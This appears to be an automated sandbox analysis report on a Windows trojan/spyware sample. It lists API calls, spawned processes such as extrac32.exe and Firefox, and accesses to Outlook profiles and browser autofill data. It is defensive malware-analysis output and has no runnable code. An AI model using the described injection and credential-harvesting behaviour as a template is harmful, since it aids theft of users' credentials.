        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295FF632_2_3295FF63
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32939C982_2_32939C98
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B8CDF2_2_328B8CDF
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A8CE02_2_328A8CE0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BFCE02_2_328BFCE0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3296ACEB2_2_3296ACEB
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32890C122_2_32890C12
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328AAC202_2_328AAC20
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3294EC4C2_2_3294EC4C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295EC602_2_3295EC60
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32956C692_2_32956C69
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B2DB02_2_328B2DB0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A9DD02_2_328A9DD0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295FD272_2_3295FD27
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32957D4C2_2_32957D4C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A0D692_2_328A0D69
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051BA5265_2_051BA526
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051AF5C95_2_051AF5C9
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051A75C65_2_051A75C6
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050F04455_2_050F0445
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051A67575_2_051A6757
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050F27605_2_050F2760
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050FA7605_2_050FA760
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_0510C6005_2_0510C600
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_0518D62C5_2_0518D62C
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_0519D6465_2_0519D646
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051146705_2_05114670
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050F06805_2_050F0680
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051AA6C05_2_051AA6C0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051AF6F65_2_051AF6F6
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050EC6E05_2_050EC6E0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051636EC5_2_051636EC
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051B010E5_2_051B010E
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050DF1135_2_050DF113
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_0518D1305_2_0518D130
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_0513717A5_2_0513717A
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050F51C05_2_050F51C0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_0510B1E05_2_0510B1E0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_0519E0765_2_0519E076
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_0512508C5_2_0512508C
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050E00A05_2_050E00A0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050FB0D05_2_050FB0D0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051A70F15_2_051A70F1
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050FE3105_2_050FE310
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051AF3305_2_051AF330
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050E13805_2_050E1380
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050B22455_2_050B2245
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051A124C5_2_051A124C
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050DD2EC5_2_050DD2EC
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050EAD005_2_050EAD00
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051AFD275_2_051AFD27
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051A7D4C5_2_051A7D4C
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050F0D695_2_050F0D69
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05102DB05_2_05102DB0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050F9DD05_2_050F9DD0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_0518FDF45_2_0518FDF4
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050E0C125_2_050E0C12
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050FAC205_2_050FAC20
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_0519EC4C5_2_0519EC4C
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050F3C605_2_050F3C60
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051A6C695_2_051A6C69
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051AEC605_2_051AEC60
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05189C985_2_05189C98
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05108CDF5_2_05108CDF
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_0510FCE05_2_0510FCE0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051BACEB5_2_051BACEB
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050FCF005_2_050FCF00
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051AFF635_2_051AFF63
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051AEFBF5_2_051AEFBF
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051A1FC65_2_051A1FC6
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050F6FE05_2_050F6FE0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05110E505_2_05110E50
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05190E6D5_2_05190E6D
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051A0EAD5_2_051A0EAD
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050F1EB25_2_050F1EB2
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051A9ED25_2_051A9ED2
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050E2EE85_2_050E2EE8
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050EE9A05_2_050EE9A0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051AE9A65_2_051AE9A6
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051359C05_2_051359C0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050B99E85_2_050B99E8
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_0511E8105_2_0511E810
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050F38005_2_050F3800
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051908355_2_05190835
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_0510B8705_2_0510B870
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050D68685_2_050D6868
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051AF8725_2_051AF872
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050F98705_2_050F9870
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051068825_2_05106882
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051698B25_2_051698B2
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051A18DA5_2_051A18DA
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050F28C05_2_050F28C0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051A78F35_2_051A78F3
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_0512DB195_2_0512DB19
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_050F0B105_2_050F0B10
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051AFB2E5_2_051AFB2E
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05164BC05_2_05164BC0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051ACA135_2_051ACA13
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051AEA5B5_2_051AEA5B
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051AFA895_2_051AFA89
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_0510FAA05_2_0510FAA0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030C15D05_2_030C15D0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030C21505_2_030C2150
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030D70A05_2_030D70A0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030BCA405_2_030BCA40
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030BAAC05_2_030BAAC0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030BC8185_2_030BC818
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030BC8205_2_030BC820
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030C2CF05_2_030C2CF0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: String function: 05125050 appears 36 times
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: String function: 050DB910 appears 266 times
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: String function: 05137BE4 appears 88 times
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: String function: 0515E692 appears 84 times
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: String function: 0516EF10 appears 105 times
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: String function: 3288B910 appears 219 times
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: String function: 328E7BE4 appears 84 times
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: String function: 3291EF10 appears 105 times
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: String function: 328D5050 appears 36 times
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: String function: 3290E692 appears 83 times
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D34E0 NtCreateMutant,LdrInitializeThunk,2_2_328D34E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_328D2B90
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_328D2D10
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D4260 NtSetContextThread,2_2_328D4260
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D4570 NtSuspendThread,2_2_328D4570
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2A80 NtClose,2_2_328D2A80
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2AA0 NtQueryInformationFile,2_2_328D2AA0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2AC0 NtEnumerateValueKey,2_2_328D2AC0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2A10 NtWriteFile,2_2_328D2A10
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2B80 NtCreateKey,2_2_328D2B80
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2BC0 NtQueryInformationToken,2_2_328D2BC0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2BE0 NtQueryVirtualMemory,2_2_328D2BE0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2B00 NtQueryValueKey,2_2_328D2B00
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2B10 NtAllocateVirtualMemory,2_2_328D2B10
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2B20 NtQueryInformationProcess,2_2_328D2B20
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D38D0 NtGetContextThread,2_2_328D38D0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D29D0 NtWaitForSingleObject,2_2_328D29D0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D29F0 NtReadFile,2_2_328D29F0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2E80 NtCreateProcessEx,2_2_328D2E80
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2EB0 NtProtectVirtualMemory,2_2_328D2EB0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2EC0 NtQuerySection,2_2_328D2EC0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2ED0 NtResumeThread,2_2_328D2ED0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2E00 NtQueueApcThread,2_2_328D2E00
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2E50 NtCreateSection,2_2_328D2E50
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2FB0 NtSetValueKey,2_2_328D2FB0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2F00 NtCreateFile,2_2_328D2F00
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2F30 NtOpenDirectoryObject,2_2_328D2F30
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D3C90 NtOpenThread,2_2_328D3C90
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2CD0 NtEnumerateKey,2_2_328D2CD0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2CF0 NtDelayExecution,2_2_328D2CF0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2C10 NtOpenProcess,2_2_328D2C10
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2C20 NtSetInformationFile,2_2_328D2C20
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D3C30 NtOpenProcessToken,2_2_328D3C30
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2C30 NtMapViewOfSection,2_2_328D2C30
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2C50 NtUnmapViewOfSection,2_2_328D2C50
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2DA0 NtReadVirtualMemory,2_2_328D2DA0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2DC0 NtAdjustPrivilegesToken,2_2_328D2DC0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2D50 NtWriteVirtualMemory,2_2_328D2D50
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05124570 NtSuspendThread,LdrInitializeThunk,5_2_05124570
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051234E0 NtCreateMutant,LdrInitializeThunk,5_2_051234E0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05124260 NtSetContextThread,LdrInitializeThunk,5_2_05124260
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122D10 NtQuerySystemInformation,LdrInitializeThunk,5_2_05122D10
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122DA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_05122DA0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122C30 NtMapViewOfSection,LdrInitializeThunk,5_2_05122C30
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122C50 NtUnmapViewOfSection,LdrInitializeThunk,5_2_05122C50
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122CF0 NtDelayExecution,LdrInitializeThunk,5_2_05122CF0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122F00 NtCreateFile,LdrInitializeThunk,5_2_05122F00
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122E00 NtQueueApcThread,LdrInitializeThunk,5_2_05122E00
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122E50 NtCreateSection,LdrInitializeThunk,5_2_05122E50
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122ED0 NtResumeThread,LdrInitializeThunk,5_2_05122ED0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051229F0 NtReadFile,LdrInitializeThunk,5_2_051229F0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051238D0 NtGetContextThread,LdrInitializeThunk,5_2_051238D0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122B10 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_05122B10
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122B00 NtQueryValueKey,LdrInitializeThunk,5_2_05122B00
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122B90 NtFreeVirtualMemory,LdrInitializeThunk,5_2_05122B90
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122B80 NtCreateKey,LdrInitializeThunk,5_2_05122B80
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122BC0 NtQueryInformationToken,LdrInitializeThunk,5_2_05122BC0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122A10 NtWriteFile,LdrInitializeThunk,5_2_05122A10
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122A80 NtClose,LdrInitializeThunk,5_2_05122A80
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122AC0 NtEnumerateValueKey,LdrInitializeThunk,5_2_05122AC0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122D50 NtWriteVirtualMemory,5_2_05122D50
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122DC0 NtAdjustPrivilegesToken,5_2_05122DC0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122C10 NtOpenProcess,5_2_05122C10
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05123C30 NtOpenProcessToken,5_2_05123C30
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122C20 NtSetInformationFile,5_2_05122C20
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05123C90 NtOpenThread,5_2_05123C90
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122CD0 NtEnumerateKey,5_2_05122CD0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122F30 NtOpenDirectoryObject,5_2_05122F30
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122FB0 NtSetValueKey,5_2_05122FB0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122E80 NtCreateProcessEx,5_2_05122E80
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122EB0 NtProtectVirtualMemory,5_2_05122EB0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122EC0 NtQuerySection,5_2_05122EC0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_051229D0 NtWaitForSingleObject,5_2_051229D0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122B20 NtQueryInformationProcess,5_2_05122B20
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122BE0 NtQueryVirtualMemory,5_2_05122BE0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_05122AA0 NtQueryInformationFile,5_2_05122AA0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030D4BE0 NtReadFile,5_2_030D4BE0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030D4AB0 NtCreateFile,5_2_030D4AB0
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030D4E50 NtAllocateVirtualMemory,5_2_030D4E50
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030D4D20 NtClose,5_2_030D4D20
        Source: C:\Windows\SysWOW64\extrac32.exeCode function: 5_2_030D4CA0 NtDeleteFile,5_2_030D4CA0
        Source: U6SJBLxT2Z.exe, 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameorthography.exeT vs U6SJBLxT2Z.exe
        Source: U6SJBLxT2Z.exe, 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs U6SJBLxT2Z.exe
        Source: U6SJBLxT2Z.exe, 00000002.00000002.12033758013.0000000032B30000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs U6SJBLxT2Z.exe
        Source: U6SJBLxT2Z.exe, 00000002.00000003.11985690204.000000000270B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameextrac32.exej% vs U6SJBLxT2Z.exe
        Source: U6SJBLxT2Z.exe, 00000002.00000000.11814130721.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameorthography.exeT vs U6SJBLxT2Z.exe
        Source: U6SJBLxT2Z.exe, 00000002.00000003.11985854504.00000000026FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameextrac32.exej% vs U6SJBLxT2Z.exe
        Source: U6SJBLxT2Z.exe, 00000002.00000003.11934530000.0000000032622000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs U6SJBLxT2Z.exe
        Source: U6SJBLxT2Z.exe, 00000002.00000002.12020854946.0000000002701000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameextrac32.exej% vs U6SJBLxT2Z.exe
        Source: U6SJBLxT2Z.exe, 00000002.00000003.11939159461.00000000327D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs U6SJBLxT2Z.exe
        Source: U6SJBLxT2Z.exeBinary or memory string: OriginalFilenameorthography.exeT vs U6SJBLxT2Z.exe
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: edgegdi.dllJump to behavior
        Source: U6SJBLxT2Z.exeStatic PE information: invalid certificate
        Source: U6SJBLxT2Z.exeReversingLabs: Detection: 25%
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeFile read: C:\Users\user\Desktop\U6SJBLxT2Z.exeJump to behavior
        Source: U6SJBLxT2Z.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\U6SJBLxT2Z.exe C:\Users\user\Desktop\U6SJBLxT2Z.exe
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeProcess created: C:\Users\user\Desktop\U6SJBLxT2Z.exe C:\Users\user\Desktop\U6SJBLxT2Z.exe
        Source: C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\Windows\SysWOW64\extrac32.exe
        Source: C:\Windows\SysWOW64\extrac32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeProcess created: C:\Users\user\Desktop\U6SJBLxT2Z.exe C:\Users\user\Desktop\U6SJBLxT2Z.exeJump to behavior
        Source: C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\Windows\SysWOW64\extrac32.exeJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 0_2_004034C5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034C5
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeFile created: C:\Users\user\AppData\Local\subrigidnessJump to behavior
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeFile created: C:\Users\user\AppData\Local\Temp\nst909.tmpJump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/7@19/17
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 0_2_004021A2 LdrInitializeThunk,CoCreateInstance,0_2_004021A2
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 0_2_00404858 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,LdrInitializeThunk,SetDlgItemTextW,LdrInitializeThunk,0_2_00404858
        Source: 54Z8E45.5.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
        Source: C:\Windows\SysWOW64\extrac32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: U6SJBLxT2Z.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: U6SJBLxT2Z.exe, 00000002.00000001.11817930124.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000004.00000002.16758521202.000000000009E000.00000002.00000001.01000000.00000009.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16758517604.000000000009E000.00000002.00000001.01000000.00000009.sdmp
